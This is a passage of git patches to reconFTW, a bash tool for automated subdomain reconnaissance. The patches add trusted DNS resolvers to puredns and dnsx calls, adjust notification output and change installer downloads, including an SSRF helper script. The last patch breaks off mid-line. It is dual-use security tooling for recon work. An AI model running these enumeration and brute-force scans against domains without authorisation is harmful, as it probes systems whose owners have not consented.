From 2116a699f22d095b35a2da26edd867d3806f24dd Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 12 Apr 2021 13:54:18 +0200 Subject: [PATCH 01/19] Puredns trusted enhancement --- install.sh | 2 ++ reconftw.cfg | 1 + reconftw.sh | 35 ++++++++++++++++++----------------- 3 files changed, 21 insertions(+), 17 deletions(-) diff --git a/install.sh b/install.sh index d4ccfbe5..58e5c3ec 100755 --- a/install.sh +++ b/install.sh @@ -255,6 +255,8 @@ if [ ! -s "resolvers.txt" ] || [ $(find "resolvers.txt" -mtime +1 -print) ]; the fi eval h8mail -g $DEBUG_STD +echo -e "8.8.8.8\n8.8.4.4" > $dir/puredns/trusted.txt + ## Stripping all Go binaries eval strip -s $HOME/go/bin/* $DEBUG_STD diff --git a/reconftw.cfg b/reconftw.cfg index d8226145..b2c5c274 100644 --- a/reconftw.cfg +++ b/reconftw.cfg @@ -121,6 +121,7 @@ BRUTESPRAY_CONCURRENCE=10 ARJUN_THREADS=20 GAUPLUS_THREADS=10 DALFOX_THREADS=200 +PUREDNS_TRUSTED_LIMIT=400 # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt diff --git a/reconftw.sh b/reconftw.sh index 20b5796f..a37d1e3d 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -375,7 +375,7 @@ function sub_active(){ fi cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt - eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD echo $domain | dnsx -silent | anew -q .tmp/subdomains_tmp.txt NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]} @@ -390,7 +390,7 @@ function sub_dns(){ start_subfunc "Running : DNS Subdomain Enumeration" eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt $DEBUG_STD cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt - eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]} else @@ -403,9 +403,9 @@ function sub_brute(){ then start_subfunc "Running : Bruteforce Subdomain Enumeration" if [ "$DEEP" = true ] ; then - eval $tools/puredns/puredns bruteforce $subs_wordlist_big $domain -w .tmp/subs_brute.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns bruteforce $subs_wordlist_big $domain -w .tmp/subs_brute.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD else - eval $tools/puredns/puredns bruteforce $subs_wordlist $domain -w .tmp/subs_brute.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns bruteforce $subs_wordlist $domain -w .tmp/subs_brute.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD fi NUMOFLINES=$(eval cat .tmp/subs_brute.txt $DEBUG_ERROR | sed "s/*.//" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} @@ -433,7 +433,7 @@ function sub_scraping(){ fi sed -i '/^.\{2048\}./d' .tmp/gospider.txt cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt - eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l) cat .tmp/diff_scrap.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} @@ -452,41 +452,41 @@ function sub_permut(){ start_subfunc "Running : Permutations Subdomain Enumeration" if [ "$DEEP" = true ] ; then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 100 ]] then eval DNScewl --tL .tmp/subs_no_resolved.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 200 ]] then eval DNScewl --tL .tmp/subs_no_resolved.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else if [[ $(cat subdomains/subdomains.txt | wc -l) -le 100 ]] then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat subdomains/subdomains.txt | wc -l) -le 200 ]] then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else printf "\n${bred} Skipping Permutations: Too Much Subdomains${reset}\n\n" @@ -571,17 +571,18 @@ function sub_recursive(){ if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 1000 ]] then start_subfunc "Running : Subdomains recursive search" + echo "" > .tmp/brute_recursive_wordlist.txt for sub in $(cat subdomains/subdomains.txt); do - sed "s/$/.$sub/" $subs_wordlist | anew -q .tmp/brute_recursive_wordlist.txt + sed "s/$/.$sub/" $subs_wordlist >> .tmp/brute_recursive_wordlist.txt done - eval $tools/puredns/puredns resolve .tmp/brute_recursive_wordlist.txt -r $resolvers -w .tmp/brute_recursive_result.txt $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/brute_recursive_wordlist.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT -w .tmp/brute_recursive_result.txt $DEBUG_STD cat .tmp/brute_recursive_result.txt | anew -q .tmp/brute_recursive.txt eval DNScewl --tL .tmp/brute_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1_recursive.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1_recursive.txt -w .tmp/permute1_recursive_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1_recursive.txt -w .tmp/permute1_recursive_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1_recursive.txt eval DNScewl --tL .tmp/permute1_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2_recursive.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2_recursive.txt -w .tmp/permute2_recursive_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2_recursive.txt -w .tmp/permute2_recursive_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_recursive.txt .tmp/permute2_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_recursive.txt NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) From b5ee00a626523955f5e4de48b755fe647c8429b4 Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 12 Apr 2021 14:29:35 +0200 Subject: [PATCH 02/19] Better notification output --- reconftw.sh | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index a37d1e3d..c62c3cb0 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -1362,20 +1362,20 @@ function notification(){ then case $2 in info) - text="\n${bblue} ${1} ${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY + text="\n${bblue} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY ;; warn) - text="\n${yellow} ${1} ${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY + text="\n${yellow} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY ;; error) - text="\n${bred} ${1} ${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY + text="\n${bred} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY ;; good) - text="\n${bgreen} ${1} ${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY + text="\n${bgreen} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY ;; esac fi From 52d8516c9fe015e824e9ac7f8706d6c334d81973 Mon Sep 17 00:00:00 2001 From: MikeeI Date: Thu, 15 Apr 2021 16:59:11 +0200 Subject: [PATCH 03/19] Typo in README.md reconftw.cfg --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 3ab144bf..bb92cd0a 100644 --- a/README.md +++ b/README.md @@ -90,7 +90,7 @@ reconFTW is a tool designed to perform automated recon on a target domain by run # Config file -- Through ```reconftw.config``` file the whole execution of the tool can be controlled. +- Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools config files, APIs/TOKENS, personalized wordlists
From 8b54f82d1e13509e7cf0b0f3aa00b2c30b53bf55 Mon Sep 17 00:00:00 2001 From: six2dez Date: Fri, 16 Apr 2021 17:07:02 +0200 Subject: [PATCH 04/19] Trusted resolvers, added resolvers to dnsx && nuclei --- install.sh | 4 +- reconftw.cfg | 1 + reconftw.sh | 128 +++++++++++++++++++++++++-------------------------- 3 files changed, 66 insertions(+), 67 deletions(-) diff --git a/install.sh b/install.sh index 58e5c3ec..de51ed50 100755 --- a/install.sh +++ b/install.sh @@ -43,7 +43,6 @@ repos["Gf-Patterns"]="1ndianl33t/Gf-Patterns" repos["github-search"]="gwen001/github-search" repos["ctfr"]="UnaPibaGeek/ctfr" repos["LinkFinder"]="dark-warlord14/LinkFinder" -repos["dnsgen"]="ProjectAnte/dnsgen" repos["ParamSpider"]="devanshbatham/ParamSpider" repos["Corsy"]="s0md3v/Corsy" repos["CMSeeK"]="Tuhinshubhra/CMSeeK" @@ -241,6 +240,7 @@ eval wget -nc -O ~/.gf/potential.json https://raw.githubusercontent.com/devanshb eval wget -nc -O ~/.config/notify/notify.conf https://gist.githubusercontent.com/six2dez/23a996bca189a11e88251367e6583053/raw/a66c4d8cf47a3bc95f5e9ba84773428662ea760c/notify_sample.conf $DEBUG_ERROR eval wget -N -c https://raw.githubusercontent.com/m4ll0k/Bug-Bounty-Toolz/master/getjswords.py $DEBUG_STD eval wget -N -c https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt $DEBUG_STD && mv best-dns-wordlist.txt subdomains_big.txt +eval wget -N -c -O trusted_resolvers.txt https://gist.githubusercontent.com/six2dez/ae9ed7e5c786461868abd3f2344401b6/raw eval wget -N -c -O subdomains.txt https://gist.github.com/six2dez/a307a04a222fab5a57466c51e1569acf/raw $DEBUG_STD eval wget -N -c -O permutations_list.txt https://gist.github.com/six2dez/ffc2b14d283e8f8eff6ac83e20a3c4b4/raw $DEBUG_STD eval wget -N -c -O asyncio_ssrf.py https://gist.github.com/h4ms1k/adcc340495d418fcd72ec727a116fea2/raw $DEBUG_STD && cp asyncio_ssrf.py ssrf.py @@ -255,8 +255,6 @@ if [ ! -s "resolvers.txt" ] || [ $(find "resolvers.txt" -mtime +1 -print) ]; the fi eval h8mail -g $DEBUG_STD -echo -e "8.8.8.8\n8.8.4.4" > $dir/puredns/trusted.txt - ## Stripping all Go binaries eval strip -s $HOME/go/bin/* $DEBUG_STD diff --git a/reconftw.cfg b/reconftw.cfg index b2c5c274..c001d1d3 100644 --- a/reconftw.cfg +++ b/reconftw.cfg @@ -129,3 +129,4 @@ lfi_wordlist=${tools}/lfi_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_big.txt resolvers=${tools}/resolvers.txt +resolvers_trusted=${tools}/resolvers_trusted.txt \ No newline at end of file diff --git a/reconftw.sh b/reconftw.sh index c62c3cb0..fd5710c2 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -375,8 +375,8 @@ function sub_active(){ fi cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt - eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD - echo $domain | dnsx -silent | anew -q .tmp/subdomains_tmp.txt + eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + echo $domain | eval dnsx -silent -r $resolvers_trusted $DEBUG_ERROR | anew -q .tmp/subdomains_tmp.txt NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]} else @@ -388,9 +388,9 @@ function sub_dns(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : DNS Subdomain Enumeration" - eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt $DEBUG_STD + eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt -r $resolvers_trusted $DEBUG_STD cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt - eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]} else @@ -403,9 +403,9 @@ function sub_brute(){ then start_subfunc "Running : Bruteforce Subdomain Enumeration" if [ "$DEEP" = true ] ; then - eval $tools/puredns/puredns bruteforce $subs_wordlist_big $domain -w .tmp/subs_brute.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns bruteforce $subs_wordlist_big $domain -w .tmp/subs_brute.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD else - eval $tools/puredns/puredns bruteforce $subs_wordlist $domain -w .tmp/subs_brute.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns bruteforce $subs_wordlist $domain -w .tmp/subs_brute.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD fi NUMOFLINES=$(eval cat .tmp/subs_brute.txt $DEBUG_ERROR | sed "s/*.//" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} @@ -433,7 +433,7 @@ function sub_scraping(){ fi sed -i '/^.\{2048\}./d' .tmp/gospider.txt cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt - eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l) cat .tmp/diff_scrap.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} @@ -452,41 +452,41 @@ function sub_permut(){ start_subfunc "Running : Permutations Subdomain Enumeration" if [ "$DEEP" = true ] ; then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 100 ]] then eval DNScewl --tL .tmp/subs_no_resolved.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 200 ]] then eval DNScewl --tL .tmp/subs_no_resolved.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else if [[ $(cat subdomains/subdomains.txt | wc -l) -le 100 ]] then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat subdomains/subdomains.txt | wc -l) -le 200 ]] then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else printf "\n${bred} Skipping Permutations: Too Much Subdomains${reset}\n\n" @@ -510,12 +510,50 @@ function sub_permut(){ fi } +function sub_recursive(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBRECURSIVE" = true ] + then + if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 1000 ]] + then + start_subfunc "Running : Subdomains recursive search" + echo "" > .tmp/brute_recursive_wordlist.txt + for sub in $(cat subdomains/subdomains.txt); do + sed "s/$/.$sub/" $subs_wordlist >> .tmp/brute_recursive_wordlist.txt + done + eval $tools/puredns/puredns resolve .tmp/brute_recursive_wordlist.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT -w .tmp/brute_recursive_result.txt $DEBUG_STD + cat .tmp/brute_recursive_result.txt | anew -q .tmp/brute_recursive.txt + + eval DNScewl --tL .tmp/brute_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1_recursive.txt + eval $tools/puredns/puredns resolve .tmp/DNScewl1_recursive.txt -w .tmp/permute1_recursive_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval cat .tmp/permute1_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1_recursive.txt + eval DNScewl --tL .tmp/permute1_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2_recursive.txt + eval $tools/puredns/puredns resolve .tmp/DNScewl2_recursive.txt -w .tmp/permute2_recursive_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval cat 